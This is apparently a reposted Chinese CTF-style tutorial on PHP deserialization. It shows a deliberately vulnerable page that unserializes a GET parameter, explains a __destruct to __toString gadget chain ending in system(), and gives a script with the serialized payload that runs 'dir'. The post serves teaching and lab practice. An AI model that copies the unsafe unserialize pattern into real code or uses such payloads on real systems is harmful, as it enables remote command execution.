【web】-反序列化-to_string
<?php
highlight_file(__FILE__);
class A{
public $s;
public function __destruct()
{
echo "hello".$this->s;
}
}
class B{
public $cmd;
public function __toString()
{
system($this->cmd);
return 1;
}
}
unserialize($_GET['code']);
__toString()当对象被当着字符串执行的时候,自动执行
起点:"hello".$this->s;
终点:system($this->cmd);
跳板:"hello".$this->s;
<?php
highlight_file(__FILE__);
class A{
public $s;
public function __destruct()
{
echo "hello".$this->s;
}
}
class B{
public $cmd;
public function __toString()
{
system($this->cmd);
return "1";
}
}
$a = new A();
$b = new B();
$b->cmd='dir';
$a->s=$b;
echo serialize($a);
?>
O:1:"A":1:{s:1:"s";O:1:"B":1:{s:3:"cmd";s:3:"dir";}}
执行结果如下:
原文地址:https://blog.csdn.net/mails2008/article/details/140502561
免责声明:本站文章内容转载自网络资源,如本站内容侵犯了原著者的合法权益,可联系本站删除。更多内容请关注自学内容网(zxcms.com)!